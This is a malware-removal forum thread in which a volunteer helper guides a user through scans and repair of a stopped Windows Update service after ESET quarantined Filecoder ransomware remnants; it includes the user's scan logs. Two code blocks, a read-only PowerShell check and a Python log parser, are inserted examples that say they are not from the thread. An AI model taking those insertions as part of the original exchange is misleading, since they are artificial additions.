sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\nl-nl\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pl-pl\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pl-pl\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pt-br\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pt-br\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pt-pt\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\pt-pt\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ru-ru\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\ru-ru\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\sv-se\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\sv-se\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\tr-tr\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\tr-tr\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-cn\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-cn\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-hk\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-hk\how_decrypt.html"
sh=1037C593596E30F773DB97DF99DBE92015A8C66A ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-tw\how_decrypt.gif"
sh=9A509A9822B86EC1676261B3FCCE45E88D536F67 ft=0 fh=0000000000000000 vn="Win32/Filecoder.EA.Gen trojan (deleted - quarantined)" ac=C fn="D:\EFI\Microsoft\Boot\zh-tw\how_decrypt.html"
#11
Nevan
    Trusted Helper
  • Malware Removal
  • 1,765 posts
Hello again, xander291190.

I've noticed that you ran both MBAM and ESET with default settings and that you stopped MBAM from scanning. It is really important that the procedures are performed the way given. Please perform instructions as they are.

ESET has found some files that seem to be remnants of Filecoder ransomware. Its symptoms are that your files get encrypted and you don't have access to them anymore. Have you had it removed earlier?

Also, perform the following instructions.

Step #1
Services edit
  • Click Start>type services.msc in the search box and click Enter. A window will appear.
  • Search for Windows Update, then right-click it and choose Properties.
  • In a window that appears, change the Startup type to Automatic.
  • Click OK and restart your system.
 
Step #2
Farbar Service Scanner
  • Right click FSS.exe on your desktop and click Run as administrator.
  • Make sure that all options are checked and click Scan
  • It will create a log (FSS.txt) on the Desktop.
  • Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply
 
Step #3
Malwarebytes Anti-Malware
  • Launch Malwarebytes Anti-Malware
  • In Database version section, click Update Now
  • Once the update is done, click Settings>Detection and Protection
  • Make sure that all three boxes under Detection Options are checked
  • Go back to Dashboard and click the big, green Scan Now button.
  • Wait for Malwarebytes Anti-Malware to finish the scan. DO NOT CANCEL IT!
  • If the program detects anything, click Remove Selected. The program might want to reboot the system. Allow it if it wants to.
  • Once the deletion is done (or after reboot), go to History, select Application Logs and click the latest Scan Log.
  • Click Export, then click Copy to Clipboard.
  • Paste (CTRL+V) the log into your next reply.
 
Things that should appear in your next post:
  • Answer to my question about Filecoder
  • FSS.txt log content
  • Malwarebytes Anti-Malware log content

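As an added example (not code from this thread, and not part of Farbar Service Scanner or Malwarebytes), the checks behind Step 1 and the FSS report as a read-only PowerShell script: state and start type of the wuauserv and WinDefend services, the DisableAntiSpyware value FSS prints under "Windows Defender Disabled Policy", and the Authenticode status of a few of the service binaries FSS lists in its File Check. The file list and an elevated prompt on Windows 8.1 are assumptions.

```powershell
# Added example (not from the thread, FSS or Malwarebytes): a read-only
# PowerShell check of what Step 1 and the FSS report look at.
# Assumed: run from an elevated PowerShell prompt on Windows 8.1.

Set-StrictMode -Version Latest

# Services discussed in the thread: Windows Update (Step 1) and Windows Defender.
$ServicesToCheck = @('wuauserv', 'WinDefend')

# Key and value FSS prints under "Windows Defender Disabled Policy".
$DefenderKey   = 'HKLM:\SOFTWARE\Microsoft\Windows Defender'
$DefenderValue = 'DisableAntiSpyware'

# A subset of the service binaries FSS verifies in its "File Check" section (assumed list).
$FilesToCheck = @(
    "$env:SystemRoot\System32\wuaueng.dll",
    "$env:SystemRoot\System32\qmgr.dll",
    "$env:SystemRoot\System32\mpssvc.dll",
    "$env:SystemRoot\System32\drivers\tcpip.sys"
)

function Get-ServiceHealth {
    param([Parameter(Mandatory)][string]$Name)
    # Win32_Service exposes StartMode (Auto/Manual/Disabled) and the image path,
    # which is what FSS reports as "start type" and "ImagePath".
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'"
    if ($null -eq $svc) {
        return [pscustomobject]@{ Name = $Name; Present = $false; State = 'Missing'; StartMode = $null; Path = $null }
    }
    [pscustomobject]@{
        Name      = $svc.Name
        Present   = $true
        State     = $svc.State
        StartMode = $svc.StartMode
        Path      = $svc.PathName
    }
}

function Get-DefenderDisabledValue {
    # Returns the DWORD when present, $null when the value does not exist.
    $item = Get-ItemProperty -Path $DefenderKey -Name $DefenderValue -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$DefenderValue
}

function Test-SystemFileSignature {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) {
        return [pscustomobject]@{ Path = $Path; Status = 'NotFound'; Signer = $null }
    }
    # Get-AuthenticodeSignature also resolves catalog-signed Windows binaries,
    # so a stock system file should come back as Valid.
    $sig = Get-AuthenticodeSignature -FilePath $Path
    [pscustomobject]@{
        Path   = $Path
        Status = $sig.Status.ToString()   # Valid, NotSigned, HashMismatch, ...
        Signer = if ($null -ne $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
    }
}

Write-Host '== Services =='
foreach ($name in $ServicesToCheck) {
    $h = Get-ServiceHealth -Name $name
    $note = ''
    if (-not $h.Present) {
        $note = '  <-- service missing'
    } elseif ($h.StartMode -eq 'Disabled') {
        $note = '  <-- disabled; Step 1 sets Windows Update back to Automatic'
    } elseif ($h.State -ne 'Running') {
        $note = '  <-- not running (what FSS reported for both services)'
    }
    '{0,-9} State={1,-8} StartMode={2,-8}{3}' -f $h.Name, $h.State, $h.StartMode, $note
}

Write-Host "`n== Windows Defender policy =="
$disabled = Get-DefenderDisabledValue
if ($null -eq $disabled) {
    "$DefenderValue is not set"
} else {
    # FSS showed DWORD:1 on this machine. Windows 8.1 typically writes 1 here itself
    # when a third-party antivirus registers with Action Center, so confirm which
    # product is actually active before treating this as tampering.
    "$DefenderValue = $disabled"
}

Write-Host "`n== Signature check of service binaries =="
foreach ($f in $FilesToCheck) {
    $r = Test-SystemFileSignature -Path $f
    $mark = if ($r.Status -eq 'Valid') { 'OK  ' } else { '!!  ' }
    '{0}{1,-48} {2}' -f $mark, $r.Path, $r.Status
}
```

The script only reads; changing the start type is still done through services.msc as in Step 1 (or with Set-Service -StartupType Automatic).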

#12
xander291190
    Member
  • Topic Starter
  • Member
  • 13 posts

Hi Nevan,

 

I'm not really sure what Filecoder is, if I'm honest. If it's a program or some sort of file that was on my computer, I wasn't aware of it. Maybe I deleted it without really knowing what it was. Sorry I can't really answer the question very well; I don't really recall the file.

 

Also my apologies, I didn't intentionally cancel the MalwareBytes scan. I left it running while I was away from the laptop, so maybe it cancelled by accident, I'm not sure.

 

Here's the logs:

 

MalwareBytes:

 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 8/09/2015
Scan Time: 9:09 AM
Logfile: MalwareBytes.txt
Administrator: Yes
 
Version: 2.1.8.1057
Malware Database: v2015.09.07.04
Rootkit Database: v2015.08.16.01
License: Trial
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 8.1
CPU: x64
File System: NTFS
User: user
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 339256
Time Elapsed: 29 min, 36 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)

Farbar Service Scanner Version: 26-07-2015
Ran by user (administrator) on 08-09-2015 at 10:08:56
Running from "C:\Users\user\Downloads"
Microsoft Windows 8.1 with Bing  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Action Center:
============
 
 
Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is OK.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.
 
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is OK.
The ImagePath of WinDefend service is OK.
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****
 
(end)
 
FSS:
 
Farbar Service Scanner Version: 26-07-2015
Ran by user (administrator) on 08-09-2015 at 10:08:56
Running from "C:\Users\user\Downloads"
Microsoft Windows 8.1 with Bing  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Action Center:
============
 
 
Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is OK.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.
 
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is OK.
The ImagePath of WinDefend service is OK.
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****

Edited by xander291190, 07 September 2015 - 06:16 PM.


#13
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
Hello again, xander291190.

It looks like Windows Update is still not running. We have to keep trying to repair it.

Please perform the instructions below.

Step #1
Windows Update fix

Download Windows Update Automated Troubleshooter to your Desktop and run it. A window will appear.
Click Next and wait for the program to automatically detect and fix any problems found.
Once the fixing is done, restart your system.

 
Step #2
Farbar Service Scanner
  • Download FSS.exe to your desktop.
  • Right click FSS.exe on your desktop and click Run as administrator.
  • Make sure that all options are checked and click Scan
  • It will create a log (FSS.txt) on the Desktop.
  • Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply
 
Step #3
Scan with IDTool

Please download IDTool by Nathan and save the file to the desktop.
It will come as a zipped file, so you will need to unzip it. You may do it by right-clicking on it and choosing Extract All. Extract it to your desktop.
  • Enter the IDTool directory, right-click on the IDTool icon and select Run as Administrator to start the tool.
  • IDTool needs the Microsoft .NET Framework environment to work properly, so if prompted to download & install it please agree.
  • Wait patiently until the tool collects the necessary data.
  • Once the main console is loaded, please press Rescan Computer and Generate a New Report.
  • When prompted at the main bar that Rescan is completed, press Generate Text Friendly Report for Forums.
  • Copy the entire content of the frame that appears. You may want to save it to a text file for your convenience.
Please include that in your next reply.

 
Things that should appear in your next post:
  • FSS.txt log content
  • IDTool log content

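Nevan reads the FSS log above by eye for stopped services and disable policies. The following Python is an added example, not code from this thread or from Farbar Service Scanner, that parses an FSS-style log into sections and reports the same kinds of findings; the sample log is a constructed excerpt that reuses the wording seen in this thread.

```python
import re

# Constructed excerpt of an FSS.txt log; the lines reuse the wording seen in this thread.
SAMPLE_FSS_LOG = r"""Windows Update:
============
wuauserv Service is not running. Checking service configuration:
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
Windows Defender Disabled Policy:
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
File Check:
========
C:\Windows\System32\svchost.exe => File is digitally signed
**** End of log ****
"""

UNDERLINE_RE = re.compile(r"^=+$")
NOT_RUNNING_RE = re.compile(r"^(?P<svc>\S+) Service is not running\.")
POLICY_RE = re.compile(r'^"(?P<name>[^"]+)"=DWORD:(?P<value>[0-9A-Fa-f]+)$')
FILE_RE = re.compile(r"^(?P<path>.+?) => (?P<status>.+)$")

def parse_fss(text: str) -> dict[str, list[str]]:
    # A section header is a line ending in ':' whose next line is a row of '='.
    lines = [l.rstrip() for l in text.splitlines()]
    sections: dict[str, list[str]] = {}
    current = None
    for i, line in enumerate(lines):
        nxt = lines[i + 1] if i + 1 < len(lines) else ""
        if line.endswith(":") and UNDERLINE_RE.match(nxt):
            current = line[:-1].strip()
            sections[current] = []
        elif current and line and not UNDERLINE_RE.match(line) and not line.startswith("****"):
            sections[current].append(line)   # keep non-blank body lines only
    return sections

def triage_fss(text: str) -> list[str]:
    # Lines a helper would act on: stopped services, non-zero disable policies, unsigned files.
    findings = []
    for name, body in parse_fss(text).items():
        for line in body:
            if m := NOT_RUNNING_RE.match(line):
                findings.append(f"{name}: service {m['svc']} is not running")
            elif (m := POLICY_RE.match(line)) and int(m["value"], 16) != 0:
                findings.append(f"{name}: {m['name']}={m['value']} (disable policy set)")
            elif name == "File Check" and (m := FILE_RE.match(line)) and m["status"] != "File is digitally signed":
                findings.append(f"{name}: {m['path']} -> {m['status']}")
    return findings
```

Run over the log in this thread, the same three findings come out: wuauserv stopped, WinDefend stopped, and DisableAntiSpyware set to 1.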

#14
xander291190

xander291190

    Member

  • Topic Starter
  • Member
  • 13 posts

Hi Nevan,

 

Quick question, I'm not sure the IDTool is working properly for me. I've run it as administrator, which is fine; it didn't prompt me to download the .NET framework. I left it for almost an hour thinking it was maybe doing something in the background, but came back and it was just the same empty screen.

 

I then tried to download the .NET framework myself from the Microsoft website, but when I went to install it, it said I already had it and installation wasn't necessary.

 

I tried the tool again and left it; it did the same thing, with nothing showing on the screen. I clicked Rescan to see if it did anything, and nothing happened; it just immediately said the scan was complete and nothing was in the report. Not sure what to do with it from here.

 

Here's the other information you asked for in the meantime:

 

Farbar Service Scanner Version: 26-07-2015
Ran by user (administrator) on 10-09-2015 at 00:09:15
Running from "C:\Users\user\Downloads"
Microsoft Windows 8.1 with Bing  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Action Center:
============
 
 
Windows Update:
============
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is OK.
The ImagePath of WinDefend service is OK.
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****


#15
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts
Hello again, xander.

Don't worry, it looks like everything's fine.

We're almost done. Please perform the following instructions.

Step #1
FRST Scan
  • Right click FRST64.exe on your Desktop and click Run as administrator. When the tool opens click Yes to disclaimer.
  • Make sure that Addition.txt is checked and press the Scan button.
  • It will produce two logs - one called FRST.txt and another one called Addition.txt in the same directory the tool is run from.
  • Select all (CTRL+A) the content of the logs, copy them (CTRL+C) and paste (CTRL+V) them into your next reply.
 
Step #2
Security Check

Download Security Check from here or here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.
NOTE: If SecurityCheck aborts and you get the following message: UNSUPPORTED OPERATING SYSTEM! ABORTED! try rebooting the system and then run SecurityCheck again.

 
Things that should appear in your next post:
  • FRST.txt log content
  • Addition.txt log content
  • Checkup.txt log content
